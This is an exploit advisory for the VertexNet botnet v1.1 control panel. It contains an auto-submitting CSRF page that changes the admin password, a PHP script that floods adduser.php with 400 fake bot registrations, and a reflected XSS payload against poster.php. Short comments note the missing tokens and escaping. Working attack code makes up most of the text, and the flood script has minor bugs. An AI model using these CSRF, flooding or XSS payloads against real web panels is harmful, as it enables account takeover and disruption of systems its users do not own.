# Exploit Title: VertexNet botnet v1.1 multiple vulnerabilities
# Date: 3-12-2015
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link: http://darkcomet-rat.com/
# Tested on: Windows or Linux

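1- CSRF: change password and settings:

Save this code in an HTML file and send it to the admin. When he opens it while logged in to the panel, the settings (including the panel password) will be changed. This works because the settings form apparently accepts a cross-site POST with no anti-CSRF token and no confirmation of the current password; a per-session token check on this endpoint would reject the request.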
<!-- CSRF proof of concept: the onload handler submits the form named "alqnas"
     as soon as the page loads, so the person opening it does not click anything. -->
<body onload="document.alqnas.submit()">
<!-- POST to the panel's settings page (index.php?page=set). The form carries no
     token field; presumably the panel authorises the change from the admin's
     session cookie alone, which is what a per-session anti-CSRF token check
     would prevent. -->
<form action="http://localhost/panel/index.php?page=set" method="post" name="alqnas">
<input type="text" name="maxusers" value="15" />
<input type="text" name="userswidth" value="400"  />
<input type="text" name="showgeo" value="y" />
<input type="text" name="showoff" value="y" />
<!-- Per the advisory, these two fields are the panel login that gets changed. -->
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="alqnas" />
<input type="submit" />
</form>
</body>


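2- Bot flood:

adduser.php appears to register a bot from plain GET parameters with no authentication, so anyone who can reach the panel can fill its bot list with fake entries. The following script does this; run it with PHP: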

<?php
   // Request counter for the while loop further down; starts at 1.
   $i =1;
   /**
    * Perform an HTTP GET on the given URL with cURL and hand back the result.
    *
    * @param string $url Address to request.
    * @return string|bool Response body, or false when curl_exec() fails.
    */
   function adduser($url)
   {
       $handle = curl_init();

       // CURLOPT_RETURNTRANSFER makes curl_exec() return the body instead of printing it.
       curl_setopt_array($handle, array(
           CURLOPT_URL            => $url,
           CURLOPT_RETURNTRANSFER => true,
       ));

       $response = curl_exec($handle);
       curl_close($handle);

       return $response;
   }
// Flood loop: issues one GET to adduser.php per pass and echoes the response.
// 400 is the number of requests that will be sent
while ( $i <=400){
// Both substr() calls read $d / $a before the lines below assign them, so the
// first pass sends empty values and each later pass sends the first five
// characters of the previous pass's shuffle.
$rand = substr( $d , 0 , 5 );
$shuf = substr( $a , 0 , 5 );
$d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
$a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789");
                // change localhost to the URL of the panel
// Request shape as seen by the panel: uid, country, idle and lan all carry $rand,
// cc and ver both carry $shuf, and cmpname is empty because $suf is never
// assigned in this listing. That fixed repetition is something access-log
// review or rate limiting on adduser.php can key on.
echo adduser("http://localhost/Panel/adduser.php?uid=$rand&cmpname=$suf&country=$rand&cc=$shuf&idle=$rand&lan=$rand&ver=$shuf");
   $i++;
}
?> 

3- cross site scripting (xss)

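In the file poster.php the uid parameter is not filtered for HTML, so its value is apparently written into the response unescaped
and an XSS attack is possible. Encoding the value for its output context (in PHP, htmlspecialchars() with ENT_QUOTES) would neutralise the payload below: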
http://localhost/Panel/poster.php?uid="><script>alert(/xss/)</script>


# siph0n [2015-12-07]